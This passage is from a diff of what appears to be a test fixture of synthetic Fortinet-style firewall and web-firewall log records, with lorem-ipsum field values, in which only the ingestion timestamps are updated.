subtype=turad level=high eventtime=billo logtime=doloremi srcip=10.197.128.162 srcport=2052 srcintf=lo6750 srcintfrole=ionof dstip=10.90.189.248 dstport=1293 dstintf=lo2402 dstintfrole=roi poluuid=reh sessionid=volup proto=prm action=allow policyid=iconsequ policytype=ueporr crscore=127.832000 craction=archite crlevel=tur appcat=ddo service=emp srccountry=inBC dstcountry=did trandisp=atcupi tranip=10.228.11.50 tranport=984 duration=3.401000 sentbyte=6907 rcvdbyte=422 sentpkt=mcol app=tion", "event": { - "ingested": "2021-06-29T09:33:01.618355400Z" + "ingested": "2021-12-09T13:37:31.907032400Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "date=2017-9-6 time=6:55:24 devname=moll device_id=roinBCS log_id=odit type=event subtype=vol pri=low desc=aloru user=cteturad userfrom=modi msg=cip action=deny adom=ntoccae2859.www.test session_id=incididu", "event": { - "ingested": "2021-06-29T09:33:01.618363Z" + "ingested": "2021-12-09T13:37:31.907038100Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "date=2017-9-20 time=1:57:58 devname=uinesci device_id=otamr log_id=tsed type=generic subtype=rExc pri=medium devid=saute devname=umdol logid=rerepr type=ipiscin subtype=trudexe level=high vd=ineavol srcip=10.29.34.211 srcport=5638 srcintf=eth1805 dstip=10.161.15.82 dstport=6598 dstintf=enp0s5799 poluuid=aco sessionid=eFini proto=17 action=cancel policyid=mipsa trandisp=uas duration=118.122000 sentbyte=1737 rcvdbyte=6283 devtype=umexe osname=xce osversion=1.7318 mastersrcmac=suntex srcmac=01:00:5e:5b:68:89 crscore=29.865000 craction=rcitati crlevel=siutali eventtype=uiratio user=ficia service=orsit hostname=deFinibu3940.internal.lan profile=rautod reqtype=onorumet url=https://www5.example.com/etcon/chit.txt?erspici=itinvolu#adeserun direction=unknown msg=tinv method=Utenima cat=nse catdesc=umq device_id=enim log_id=oreve pri=low userfrom=snisiu adminprof=atem timezone=ET main_type=vento trigger_policy=litsed sub_type=ciun severity_level=rehender policy=tetura src=10.124.71.88 src_port=7540 dst=10.22.248.52 dst_port=6566 http_method=cons http_url=tinvolu http_host=ptat http_agent=amquisn http_session_id=Finibus signature_subclass=nsequat signature_id=3661 srccountry=scipi content_switch_name=rem server_pool_name=reh false_positive_mitigation=rsitame user_name=tcons monitor_status=squamest http_refer=https://mail.example.com/emveleum/siuta.html?ate=epteur#onproi http_version=usmodit dev_id=orese threat_weight=umdolore history_threat_weight=umqui threat_level=adipisci ftp_mode=eir ftp_cmd=ull cipher_suite=tlabor msg_id=itecto", "event": { - "ingested": "2021-06-29T09:33:01.618370400Z" + "ingested": "2021-12-09T13:37:31.907043800Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "date=2017-10-4 time=9:00:32 logver=ametcons devid=velite devname=ipexeac logid=explicab type=samvolu subtype=teiru level=low vd=orinrep srcip=10.228.213.136 srcport=7247 srcintf=lo1719 dstip=10.185.107.27 dstport=2257 dstintf=enp0s4999 poluuid=iduntutl sessionid=mipsumd proto=udp action=block policyid=quelauda trandisp=rcit duration=166.303000 sentbyte=7229 rcvdbyte=6230 devtype=orese osname=evelite osversion=1.4895 mastersrcmac=oremipsu srcmac=01:00:5e:cd:f6:0e crscore=37.237000 craction=equunt crlevel=mto eventtype=iae user=dent service=Uten hostname=tatiset4191.localdomain profile=aconseq reqtype=mquamei url=https://api.example.org/fug/liquid.txt?ptate=lloi#nseq direction=external msg=isetqua method=ianonn cat=oluptas catdesc=doe device_id=quipex log_id=rchitect pri=very-high userfrom=Bonor adminprof=ipex timezone=PT main_type=upta trigger_policy=ivel sub_type=tmollita severity_level=tionofd policy=iatnula src=10.185.37.176 src_port=1859 dst=10.26.58.20 dst_port=2809 http_method=essequam http_url=undeo http_host=ficiade http_agent=uiinea http_session_id=uianonn signature_subclass=eavolupt signature_id=784 srccountry=elitsedq content_switch_name=liquam server_pool_name=sinto false_positive_mitigation=edi user_name=eumiure monitor_status=ore http_refer=https://internal.example.com/mSe/sis.gif?rchite=rcit#orumwri http_version=tiae dev_id=giat threat_weight=nculpa history_threat_weight=olupt threat_level=tvol ftp_mode=ostru ftp_cmd=mea cipher_suite=tuserror msg_id=agnama", "event": { - "ingested": "2021-06-29T09:33:01.618374700Z" + "ingested": "2021-12-09T13:37:31.907049800Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "logver=deritq dtime=2017-10-19 04:03:07.172538723 +0000 UTC devid=boreetdo devname=teni vd=iin date=2017-10-19 time=4:03:07 logid=nostr type=luptatem subtype=tNequepo level=low eventtime=eumfug logtime=sper srcip=10.200.12.126 srcport=2347 srcintf=enp0s7374 srcintfrole=liqu dstip=10.14.145.107 dstport=4362 dstintf=enp0s7861 dstintfrole=aliq poluuid=utem sessionid=oreetd proto=HOPOPT action=block policyid=Nequepo policytype=edictas crscore=55.933000 craction=tur crlevel=borisnis appcat=elitsedd service=hitecto srccountry=loremi dstcountry=nven trandisp=isci tranip=10.250.231.196 tranport=5863 duration=4.105000 sentbyte=2763 rcvdbyte=5047 sentpkt=aquioff app=cip", "event": { - "ingested": "2021-06-29T09:33:01.618380Z" + "ingested": "2021-12-09T13:37:31.907055500Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "logver=onsequat dtime=2017-11-02 11:05:41.432538723 +0000 UTC devid=tiumd devname=atuse vd=imad date=2017-11-2 time=11:05:41 logid=tura type=equuntur subtype=rve level=high eventtime=mqua logtime=xer srcip=10.225.34.176 srcport=5569 srcintf=lo2867 srcintfrole=amquisn dstip=10.21.203.112 dstport=5930 dstintf=enp0s1294 dstintfrole=sum poluuid=lloinve sessionid=eni proto=HOPOPT action=cancel policyid=edquiac policytype=psamvolu crscore=80.314000 craction=unturma crlevel=iavol appcat=psumdol service=urautodi srccountry=equamni dstcountry=fugia trandisp=uptate tranip=10.103.36.192 tranport=1974 duration=129.001000 sentbyte=2801 rcvdbyte=2565 sentpkt=imidest app=citation", "event": { - "ingested": "2021-06-29T09:33:01.618384500Z" + "ingested": "2021-12-09T13:37:31.907061900Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "logver=nof devname=\"usantiu\" devid=\"periam\" vd=remip date=2017-11-16 time=6:08:15 logid=dexea type=aturExc subtype=antiumto level=low eventtime=obe logtime=niamqu srcip=10.140.59.161 srcport=3599 srcintf=eth575 srcintfrole=tev dstip=10.5.67.140 dstport=5687 dstintf=enp0s6143 dstintfrole=intoc poluuid=obeataev sessionid=rrorsit proto=udp action=accept policyid=umquid policytype=olabo crscore=79.046000 craction=dolor crlevel=rsp appcat=quir service=giatqu srccountry=olors dstcountry=roid trandisp=lorum tranip=10.118.111.183 tranport=5410 duration=96.462000 sentbyte=6821 rcvdbyte=6222 sentpkt=mipsu app=nvol", "event": { - "ingested": "2021-06-29T09:33:01.618390800Z" + "ingested": "2021-12-09T13:37:31.907068800Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "date=2017-12-1 time=1:10:49 logver=llu devid=quaUt devname=labor logid=oris type=tatemse subtype=uta level=very-high vd=tse srcip=10.170.104.148 srcport=5722 srcintf=lo259 dstip=10.60.92.40 dstport=5836 dstintf=enp0s4446 poluuid=dicons sessionid=BCSedutp proto=udp action=accept policyid=ritatise trandisp=nihilm duration=104.607000 sentbyte=6659 rcvdbyte=5351 devtype=isauteir osname=eritquii osversion=1.4493 mastersrcmac=uisno srcmac=01:00:5e:e9:ec:d5 crscore=34.736000 craction=itaed crlevel=invol eventtype=Loremips user=cidun service=tassitas hostname=nimadmi4084.api.home profile=eufugia reqtype=nor url=https://example.net/aturQui/tquii.html?uiac=squ#litess direction=unknown msg=involupt method=itempo cat=upt catdesc=rve device_id=amq log_id=abillo pri=high userfrom=ationem adminprof=Nem timezone=OMST main_type=ollita trigger_policy=dipisci sub_type=amnisiu severity_level=ptat policy=epr src=10.7.70.169 src_port=2514 dst=10.28.212.191 dst_port=1997 http_method=nostru http_url=Loremip http_host=veleumiu http_agent=rcita http_session_id=turad signature_subclass=sequamni signature_id=4799 srccountry=ollita content_switch_name=ectetu server_pool_name=radi false_positive_mitigation=ula user_name=itsed monitor_status=rad http_refer=https://internal.example.com/ididu/autodit.gif?seru=oriss#imadmin http_version=suntexpl dev_id=urve threat_weight=sBonoru history_threat_weight=everi threat_level=squ ftp_mode=emagnaal ftp_cmd=nih cipher_suite=ncididu msg_id=itati", "event": { - "ingested": "2021-06-29T09:33:01.618398300Z" + "ingested": "2021-12-09T13:37:31.907072900Z" }, "tags": [ "preserve_original_event" @@ -582,7 +582,7 @@ }, "message": "date=2017-12-15 time=8:13:24 logver=estla devid=ione devname=ecillum logid=maccu type=ame subtype=pitlabo level=very-high vd=urExc srcip=10.37.124.214 srcport=6919 srcintf=lo7727 dstip=10.37.111.228 dstport=7082 dstintf=enp0s20 poluuid=dmini sessionid=tquid proto=17 action=block policyid=iatisun trandisp=cto duration=144.899000 sentbyte=2372 rcvdbyte=7417 devtype=imadmini osname=iatisund osversion=1.6506 mastersrcmac=aUtenim srcmac=01:00:5e:28:0c:11 crscore=172.422000 craction=etdol crlevel=sed eventtype=uep user=ametco service=nde hostname=reprehe3525.www5.example profile=mquisno reqtype=eaco url=https://mail.example.org/mvele/teveli.htm?Nequepor=luptate#aturvel direction=internal msg=dexea method=sedquia cat=litesse catdesc=ntmo device_id=aliqu log_id=iqu pri=very-high userfrom=ationula adminprof=doconse timezone=CEST main_type=oreeufug trigger_policy=ptatems sub_type=tenima severity_level=emagnam policy=iaco src=10.148.197.60 src_port=5711 dst=10.143.144.52 dst_port=974 http_method=nvo http_url=lab http_host=sedqui http_agent=iuntNe http_session_id=tdolor signature_subclass=Ute signature_id=2191 srccountry=uepor content_switch_name=umSecti server_pool_name=eabil false_positive_mitigation=ibusB user_name=rporis monitor_status=etco http_refer=https://example.org/ereprehe/olu.html?liqu=ipsu#siarch http_version=itautfu dev_id=rrorsi threat_weight=ole history_threat_weight=odi threat_level=tper ftp_mode=olor ftp_cmd=corpo cipher_suite=commod msg_id=iumd", "event": { - "ingested": "2021-06-29T09:33:01.618405700Z" + "ingested": "2021-12-09T13:37:31.907077500Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "logver=aborisn dtime=2017-12-29 15:15:58.472538723 +0000 UTC devid=onproid devname=sitv vd=equam date=2017-12-29 time=3:15:58 logid=bor type=ameaquei subtype=aeca level=very-high eventtime=aperiam logtime=ngelit srcip=10.217.145.137 srcport=5242 srcintf=enp0s6940 srcintfrole=orema dstip=10.22.149.132 dstport=7725 dstintf=lo7156 dstintfrole=neavolup poluuid=lits sessionid=Nemoen proto=0 action=block policyid=rur policytype=quaturve crscore=166.007000 craction=oeiusmod crlevel=uidolore appcat=iacon service=ncu srccountry=quaturve dstcountry=ciad trandisp=diconseq tranip=10.251.183.113 tranport=2604 duration=161.433000 sentbyte=5697 rcvdbyte=7299 sentpkt=eseosqu app=uptatem", "event": { - "ingested": "2021-06-29T09:33:01.618413100Z" + "ingested": "2021-12-09T13:37:31.907082700Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "logver=uamnihil devname=\"nisi\" devid=\"imadm\" vd=siutali date=2018-1-12 time=10:18:32 logid=mfugi type=ceroinBC subtype=lorumw level=low eventtime=squir logtime=commod srcip=10.183.16.252 srcport=3150 srcintf=lo6718 srcintfrole=eabillo dstip=10.203.66.175 dstport=3904 dstintf=enp0s3868 dstintfrole=dipisciv poluuid=nsequun sessionid=hen proto=icmp action=accept policyid=velillum policytype=itamet crscore=123.013000 craction=hil crlevel=itl appcat=idolo service=ncidid srccountry=oid dstcountry=iarchit trandisp=volupt tranip=10.51.60.203 tranport=5315 duration=165.955000 sentbyte=7551 rcvdbyte=1519 sentpkt=ten app=Utenim", "event": { - "ingested": "2021-06-29T09:33:01.618420800Z" + "ingested": "2021-12-09T13:37:31.907087900Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "date=2018-1-27 time=5:21:06 logver=uasiarch devid=iamquisn devname=magnama logid=reprehe type=citatio subtype=dolo level=medium vd=esciunt srcip=10.133.245.26 srcport=1727 srcintf=enp0s2674 dstip=10.76.87.30 dstport=2858 dstintf=enp0s2918 poluuid=remag sessionid=roinBCSe proto=HOPOPT action=accept policyid=labori trandisp=ditau duration=39.920000 sentbyte=5413 rcvdbyte=6650 devtype=tam osname=olu osversion=1.409 mastersrcmac=iut srcmac=01:00:5e:5c:c2:50 crscore=69.137000 craction=boris crlevel=ris eventtype=nisiuta user=utper service=uipexe hostname=ursint411.www.lan profile=gnamali reqtype=iumdo url=https://example.org/tem/iadeseru.jpg?olorsita=odoco#etc direction=internal msg=lamco method=natuser cat=Excepteu catdesc=omnis device_id=tati log_id=orinc pri=very-high userfrom=eturadi adminprof=cinge timezone=PT main_type=ira trigger_policy=niamq sub_type=quatD severity_level=nevol policy=lumquid src=10.157.14.165 src_port=7170 dst=10.61.200.105 dst_port=2813 http_method=tquov http_url=natu http_host=doei http_agent=acomm http_session_id=veleumi signature_subclass=volupt signature_id=6822 srccountry=itatise content_switch_name=ure server_pool_name=userro false_positive_mitigation=oree user_name=nimadmi monitor_status=utaliq http_refer=https://example.com/tinvolu/uredol.txt?did=lamcol#idolor http_version=tutlabor dev_id=nse threat_weight=rauto history_threat_weight=rese threat_level=nonproi ftp_mode=doconse ftp_cmd=henderi cipher_suite=tisunde msg_id=ende", "event": { - "ingested": "2021-06-29T09:33:01.618428200Z" + "ingested": "2021-12-09T13:37:31.907091800Z" }, "tags": [ "preserve_original_event" @@ -630,7 +630,7 @@ }, "message": "date=2018-2-10 time=12:23:41 logver=commod devid=oris devname=rcita logid=ataev type=oris subtype=incidi level=high vd=tutlabo srcip=10.32.66.161 srcport=881 srcintf=lo4523 dstip=10.134.238.8 dstport=2976 dstintf=enp0s1238 poluuid=edquiac sessionid=sit proto=HOPOPT action=allow policyid=olo trandisp=laboris duration=163.866000 sentbyte=7328 rcvdbyte=5375 devtype=tutl osname=nevolu osversion=1.5475 mastersrcmac=ostru srcmac=01:00:5e:e9:5f:84 crscore=157.516000 craction=aven crlevel=idolore eventtype=psaqu user=psa service=pta hostname=ididunt7607.mail.localhost profile=ntutlabo reqtype=leumiure url=https://mail.example.net/epteurs/usmodtem.gif?itvo=asi#tobe direction=internal msg=Lore method=oin cat=eritquii catdesc=taliqui device_id=ecatcu log_id=entoreve pri=high userfrom=umquam adminprof=onev timezone=CET main_type=tionev trigger_policy=ali sub_type=ionu severity_level=perna policy=moll src=10.242.178.15 src_port=3948 dst=10.217.111.77 dst_port=7309 http_method=datatno http_url=equepor http_host=antium http_agent=ugiatn http_session_id=utpe signature_subclass=hend signature_id=1170 srccountry=agnamali content_switch_name=ptateve server_pool_name=aliqua false_positive_mitigation=officiad user_name=nimadmin monitor_status=iavol http_refer=https://example.net/iumtota/qui.jpg?quel=ugitsed#ritatis http_version=olor dev_id=emoenim threat_weight=turadipi history_threat_weight=umSec threat_level=onsecte ftp_mode=inibusBo ftp_cmd=tqui cipher_suite=sequun msg_id=nimadm", "event": { - "ingested": "2021-06-29T09:33:01.618435600Z" + "ingested": "2021-12-09T13:37:31.907095800Z" }, "tags": [ "preserve_original_event" @@ -642,7 +642,7 @@ }, "message": "date=2018-2-24 time=7:26:15 logver=vitaedic devid=remip devname=rsita logid=rehe type=aper subtype=gnaa level=low vd=uta srcip=10.161.128.235 srcport=6280 srcintf=eth2121 dstip=10.84.29.117 dstport=1245 dstintf=eth7500 poluuid=errorsi sessionid=umwr proto=HOPOPT action=cancel policyid=cupida trandisp=rinc duration=5.709000 sentbyte=289 rcvdbyte=6059 devtype=dquia osname=ommod osversion=1.142 mastersrcmac=dico srcmac=01:00:5e:06:53:8a crscore=35.836000 craction=imipsa crlevel=iscinge eventtype=ora user=meumfug service=inimve hostname=mco2906.domain profile=sitvolu reqtype=eratv url=https://www.example.com/iadolo/cidu.txt?aliquide=redolori#eav direction=inbound msg=nse method=turQuis cat=tat catdesc=pta device_id=henderi log_id=onsec pri=high userfrom=itaspern adminprof=tau timezone=GMT+02:00 main_type=rsintoc trigger_policy=boreetd sub_type=rehende severity_level=sitamet policy=xerc src=10.199.119.251 src_port=7286 dst=10.86.152.227 dst_port=850 http_method=ant http_url=tiu http_host=ommodoco http_agent=rehe http_session_id=eseosqu signature_subclass=oeius signature_id=641 srccountry=eaqueip content_switch_name=laud server_pool_name=uido false_positive_mitigation=uis user_name=msequin monitor_status=autem http_refer=https://internal.example.org/ipi/qua.htm?itat=adipisc#omnisist http_version=orroqui dev_id=sci threat_weight=psamvolu history_threat_weight=itsedqui threat_level=oreve ftp_mode=omn ftp_cmd=onevol cipher_suite=ese msg_id=reprehen", "event": { - "ingested": "2021-06-29T09:33:01.618444100Z" + "ingested": "2021-12-09T13:37:31.907099800Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "date=2018-3-11 time=2:28:49 logver=eumfugia devid=nimvenia devname=dol logid=rissusc type=lit subtype=quin level=low vd=eddoei srcip=10.35.73.208 srcport=7081 srcintf=eth6552 dstip=10.216.120.61 dstport=6389 dstintf=eth2068 poluuid=dolor sessionid=emUteni proto=tcp action=deny policyid=illoin trandisp=rinre duration=166.295000 sentbyte=5988 rcvdbyte=3374 devtype=olorem osname=mquae osversion=1.1789 mastersrcmac=rQuis srcmac=01:00:5e:b5:9a:3e crscore=5.250000 craction=enimadmi crlevel=elit eventtype=uia user=tem service=unt hostname=ntex5135.corp profile=mqua reqtype=equa url=https://internal.example.com/isc/umdol.jpg?atn=sectet#boreetd direction=outbound msg=olorin method=oluptat cat=olors catdesc=mSecti device_id=ius log_id=quian pri=low userfrom=urExce adminprof=upt timezone=PST main_type=pteurs trigger_policy=intocc sub_type=abo severity_level=orisnis policy=reseo src=10.239.194.105 src_port=3629 dst=10.234.171.117 dst_port=4488 http_method=tenatus http_url=odic http_host=ono http_agent=umtota http_session_id=consequ signature_subclass=ine signature_id=3409 srccountry=dex content_switch_name=ipis server_pool_name=nsecte false_positive_mitigation=miurere user_name=tat monitor_status=pitlabor http_refer=https://example.com/olupta/ape.jpg?mnisiut=eabil#olu http_version=uaUte dev_id=empor threat_weight=ate history_threat_weight=eca threat_level=inre ftp_mode=aliqu ftp_cmd=orem cipher_suite=dquian msg_id=isaute", "event": { - "ingested": "2021-06-29T09:33:01.618449400Z" + "ingested": "2021-12-09T13:37:31.907103300Z" }, "tags": [ "preserve_original_event" @@ -666,7 +666,7 @@ }, "message": "logver=emagnaal dtime=2018-03-25 09:31:24.032538723 +0000 UTC devid=uunturm devname=nonnumq vd=tqu date=2018-3-25 time=9:31:24 logid=ntocca type=emquelau subtype=adolorsi level=medium eventtime=maliquam logtime=ovol srcip=10.34.41.75 srcport=4436 srcintf=enp0s7638 srcintfrole=eseosqu dstip=10.249.16.201 dstport=4293 dstintf=lo5084 dstintfrole=mvele poluuid=qui sessionid=etMa proto=3 action=accept policyid=aspe policytype=uradipi crscore=22.220000 craction=atu crlevel=amremape appcat=illoinve service=uis srccountry=itanimi dstcountry=rinc trandisp=isistena tranip=10.107.168.208 tranport=1864 duration=45.477000 sentbyte=1067 rcvdbyte=2855 sentpkt=ctionofd app=uianonnu", "event": { - "ingested": "2021-06-29T09:33:01.618452800Z" + "ingested": "2021-12-09T13:37:31.907107700Z" }, "tags": [ "preserve_original_event" @@ -678,7 +678,7 @@ }, "message": "logver=nisiste date=2018-4-8 time=4:33:58 log_id=sedqu devid=itautfu devname=aaliq logid=tDui type=ernatur subtype=itsed level=low vd=xeacomm srcip=10.112.57.220 srcport=5803 srcintf=enp0s1897 dstip=10.19.151.236 dstport=884 dstintf=enp0s4144 poluuid=estiaeco sessionid=vele proto=HOPOPT action=allow policyid=yCiceroi trandisp=loremeu duration=156.263000 sentbyte=3719 rcvdbyte=7292 devtype=colab osname=itte osversion=1.6905 mastersrcmac=orumS srcmac=01:00:5e:c1:b8:93 crscore=60.950000 craction=uptat crlevel=incidun eventtype=agnaaliq user=aturQuis service=cepteurs hostname=tat1845.internal.invalid profile=rumetMal reqtype=tiumtot url=https://www.example.com/imadm/ugiat.txt?Nequepor=nisiu#ptat direction=inbound msg=eddoe method=seq cat=uae catdesc=tobeata device_id=ctas log_id=vol pri=high userfrom=gna adminprof=itautf timezone=ET main_type=eprehe trigger_policy=ariatu sub_type=aqueip severity_level=aqueip policy=rautod src=10.96.168.24 src_port=6206 dst=10.109.106.194 dst_port=5356 http_method=Sedut http_url=stiaec http_host=rveli http_agent=serr http_session_id=umdolo signature_subclass=iduntut signature_id=4281 srccountry=rorsitv content_switch_name=caboNemo server_pool_name=cididun false_positive_mitigation=iamqu user_name=ommodoc monitor_status=mwrit http_refer=https://www5.example.com/madminim/onse.txt?reeuf=orinrepr#tinvo http_version=oru dev_id=ainc threat_weight=aeab history_threat_weight=iat threat_level=acom ftp_mode=olo ftp_cmd=eipsaq cipher_suite=enatu msg_id=mfu", "event": { - "ingested": "2021-06-29T09:33:01.618458100Z" + "ingested": "2021-12-09T13:37:31.907113500Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "logver=aliqui date=2018-4-22 time=11:36:32 log_id=uipexea devid=sauteiru devname=nibusB logid=eetdolo type=issuscip subtype=iduntu level=high vd=rinc srcip=10.109.224.208 srcport=1769 srcintf=enp0s3638 dstip=10.31.34.96 dstport=4651 dstintf=enp0s390 poluuid=atis sessionid=edol proto=icmp action=deny policyid=adip trandisp=ugiatq duration=128.795000 sentbyte=4249 rcvdbyte=6693 devtype=atemUte osname=emag osversion=1.1353 mastersrcmac=ecatcup srcmac=01:00:5e:63:85:d2 crscore=62.286000 craction=oin crlevel=isautem eventtype=eiusm user=assit service=ulpaq hostname=ulamc767.internal.lan profile=iades reqtype=mremape url=https://mail.example.net/ionemu/nul.jpg?volupt=ori#sed direction=inbound msg=maveniam method=ctobeat cat=emoenim catdesc=oqui device_id=olab log_id=remagnam pri=high userfrom=mSecti adminprof=volupt timezone=OMST main_type=ela trigger_policy=fugits sub_type=litseddo severity_level=idestl policy=ptasn src=10.112.155.228 src_port=5011 dst=10.47.191.95 dst_port=6242 http_method=velillu http_url=radipi http_host=iatn http_agent=aturE http_session_id=beat signature_subclass=pern signature_id=7568 srccountry=itvolupt content_switch_name=uradip server_pool_name=perspi false_positive_mitigation=uaer user_name=aed monitor_status=tectobe http_refer=https://example.org/scingeli/uatDuis.gif?apari=itesseci#utali http_version=ofdeFin dev_id=siutaliq threat_weight=urvel history_threat_weight=turE threat_level=ntium ftp_mode=imadmi ftp_cmd=dquiac cipher_suite=liquide msg_id=uatD", "event": { - "ingested": "2021-06-29T09:33:01.618463100Z" + "ingested": "2021-12-09T13:37:31.907119200Z" }, "tags": [ "preserve_original_event" @@ -702,7 +702,7 @@ }, "message": "logver=gnidolor dtime=2018-05-07 06:39:06.812538723 +0000 UTC devid=BCSedut devname=metco vd=vel date=2018-5-7 time=6:39:06 logid=tmol type=acommodi subtype=ccaecat level=low eventtime=mqu logtime=mips srcip=10.103.169.94 srcport=2174 srcintf=lo5821 srcintfrole=osqu dstip=10.140.137.17 dstport=446 dstintf=enp0s4444 dstintfrole=iono poluuid=atcupi sessionid=dexe proto=0 action=allow policyid=exerci policytype=ems crscore=15.728000 craction=nulapa crlevel=tess appcat=eroi service=enby srccountry=riatur dstcountry=amrema trandisp=illum tranip=10.62.241.218 tranport=7444 duration=5.969000 sentbyte=4832 rcvdbyte=6033 sentpkt=urere app=involu", "event": { - "ingested": "2021-06-29T09:33:01.618469500Z" + "ingested": "2021-12-09T13:37:31.907124900Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "logver=tem devname=\"litsedq\" devid=\"amre\" vd=orpori date=2018-5-21 time=1:41:41 logid=sistena type=iam subtype=saquae level=low eventtime=itanimid logtime=ianonnum srcip=10.90.229.92 srcport=6796 srcintf=lo1752 srcintfrole=inculp dstip=10.251.212.166 dstport=3925 dstintf=eth1592 dstintfrole=aboNemo poluuid=tsedquia sessionid=ididun proto=21 action=cancel policyid=enim policytype=gnido crscore=85.453000 craction=erepr crlevel=tsedqu appcat=uisa service=uptat srccountry=siutal dstcountry=umetMalo trandisp=onevolu tranip=10.77.105.160 tranport=5541 duration=155.903000 sentbyte=5294 rcvdbyte=2687 sentpkt=ira app=umfu", "event": { - "ingested": "2021-06-29T09:33:01.618477Z" + "ingested": "2021-12-09T13:37:31.907130500Z" }, "tags": [ "preserve_original_event" @@ -726,7 +726,7 @@ }, "message": "date=2018-6-4 time=8:44:15 logver=uamq devid=mnisist devname=dutp logid=ecillu type=ipsaqu subtype=asun level=very-high vd=llumd srcip=10.100.223.157 srcport=1307 srcintf=eth5742 dstip=10.232.243.87 dstport=4546 dstintf=lo299 poluuid=atisetq sessionid=mSectio proto=0 action=cancel policyid=nonnumqu trandisp=atis duration=63.050000 sentbyte=3508 rcvdbyte=205 devtype=uam osname=tisunde osversion=1.4261 mastersrcmac=rured srcmac=01:00:5e:8a:c1:2a crscore=19.243000 craction=meumfug crlevel=iam eventtype=animi user=porainc service=nsectetu hostname=spici5547.internal.test profile=tate reqtype=sintocca url=https://mail.example.org/asuntex/uovolup.html?amali=uiav#henderi direction=internal msg=tnul method=ons cat=radip catdesc=amremap device_id=dolorsit log_id=atisund pri=very-high userfrom=uredo adminprof=uamni timezone=CT main_type=quisqua trigger_policy=sedquian sub_type=lamcorpo severity_level=rem policy=apariat src=10.216.49.112 src_port=4521 dst=10.112.242.68 dst_port=3105 http_method=aut http_url=eriti http_host=ipsum http_agent=com http_session_id=uptate signature_subclass=tevelite signature_id=5880 srccountry=nimadmi content_switch_name=mquiado server_pool_name=agn false_positive_mitigation=dip user_name=urmag monitor_status=nim http_refer=https://www5.example.net/tutlabo/incid.gif?ptate=tconsect#usm http_version=uunturma dev_id=namaliqu threat_weight=tatemacc history_threat_weight=licab threat_level=roidents ftp_mode=volupta ftp_cmd=stiaeco cipher_suite=tanim msg_id=osam", "event": { - "ingested": "2021-06-29T09:33:01.618501800Z" + "ingested": "2021-12-09T13:37:31.907136200Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "date=2018-6-19 time=3:46:49 logver=tla devid=nimve devname=edutpe logid=tenb type=billoinv subtype=asia level=medium vd=paquioff srcip=10.252.175.174 srcport=1995 srcintf=enp0s1531 dstip=10.196.226.219 dstport=545 dstintf=lo2390 poluuid=uaera sessionid=nsequa proto=tcp action=accept policyid=orporis trandisp=oluptate duration=28.731000 sentbyte=2397 rcvdbyte=1768 devtype=itvolu osname=citation osversion=1.491 mastersrcmac=aincid srcmac=01:00:5e:7e:ea:3f crscore=149.960000 craction=tNeque crlevel=uidolore eventtype=uatDuisa user=usB service=magnaali hostname=istenatu3686.invalid profile=remagna reqtype=eritqu url=https://example.org/mnisiut/porinci.htm?norum=emUten#dminimve direction=internal msg=oremagna method=nulamc cat=tempori catdesc=rsintocc device_id=nderit log_id=etco pri=very-high userfrom=lore adminprof=ameiusmo timezone=PT main_type=veniamqu trigger_policy=equat sub_type=reeu severity_level=atemacc policy=rsitvolu src=10.182.58.108 src_port=4811 dst=10.96.100.84 dst_port=2253 http_method=utlabore http_url=texplica http_host=boru http_agent=ntut http_session_id=elaud signature_subclass=acomm signature_id=5667 srccountry=emUten content_switch_name=uamni server_pool_name=laboris false_positive_mitigation=pers user_name=lpaquiof monitor_status=isisten http_refer=https://api.example.net/seddoei/rnatur.jpg?olores=idolorem#umdolors http_version=uid dev_id=numqua threat_weight=citatio history_threat_weight=sed threat_level=mUten ftp_mode=eursint ftp_cmd=velillum cipher_suite=oin msg_id=teurs", "event": { - "ingested": "2021-06-29T09:33:01.618505400Z" + "ingested": "2021-12-09T13:37:31.907141800Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "logver=untutl devname=\"cons\" devid=\"vel\" vd=illumdo date=2018-7-3 time=10:49:23 logid=rios type=deF subtype=dutpe level=very-high eventtime=itan logtime=uisnos srcip=10.228.61.5 srcport=1179 srcintf=eth4741 srcintfrole=lites dstip=10.246.41.77 dstport=1217 dstintf=lo7502 dstintfrole=olu poluuid=ectet sessionid=tquovo proto=17 action=block policyid=lapa policytype=xeacom crscore=22.822000 craction=qui crlevel=henderi appcat=rainc service=dminim srccountry=sse dstcountry=tatem trandisp=umexe tranip=10.157.22.21 tranport=5252 duration=135.630000 sentbyte=2167 rcvdbyte=2952 sentpkt=quamei app=nvento", "event": { - "ingested": "2021-06-29T09:33:01.618509200Z" + "ingested": "2021-12-09T13:37:31.907147500Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "logver=qua devname=\"llumdo\" devid=\"tot\" vd=itquii date=2018-7-17 time=5:51:58 logid=psu type=iat subtype=ept level=high eventtime=ectob logtime=aUtenim srcip=10.242.119.111 srcport=645 srcintf=lo1640 srcintfrole=tDuisa dstip=10.239.231.168 dstport=88 dstintf=lo3385 dstintfrole=nimi poluuid=niamqu sessionid=uioffi proto=1 action=allow policyid=consequa policytype=tionu crscore=60.452000 craction=quines crlevel=entsu appcat=ineavol service=abor srccountry=giatq dstcountry=nonpro trandisp=elitsedd tranip=10.188.131.18 tranport=981 duration=46.954000 sentbyte=2770 rcvdbyte=4226 sentpkt=tam app=uovo", "event": { - "ingested": "2021-06-29T09:33:01.618512500Z" + "ingested": "2021-12-09T13:37:31.907153300Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "logver=orinrepr date=2018-8-1 time=12:54:32 log_id=untut devid=siu devname=lorem logid=icons 